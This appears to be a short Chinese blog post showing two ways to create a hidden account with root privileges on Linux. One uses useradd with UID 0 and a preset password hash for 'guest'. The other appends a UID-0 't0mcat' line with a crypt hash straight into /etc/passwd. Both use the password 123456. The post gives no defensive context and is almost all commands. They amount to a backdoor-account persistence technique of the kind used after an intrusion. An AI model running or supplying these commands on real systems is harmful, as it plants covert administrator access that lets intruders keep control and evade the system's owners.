创建具有root权限的账户

  • Post author:
  • Post category:其他




第一种

# guest:123456
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test

在这里插入图片描述



第二种

# t0mcat:123456
perl -le 'print crypt("123456","salt")'   # 密码:123456
echo "t0mcat:sahL5d5V.UWtI:0:0:/root:/bin/bash" >> /etc/passwd   # 账号:t0mcat

在这里插入图片描述



/etc/passwd

在这里插入图片描述



版权声明:本文为qq_43626025原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。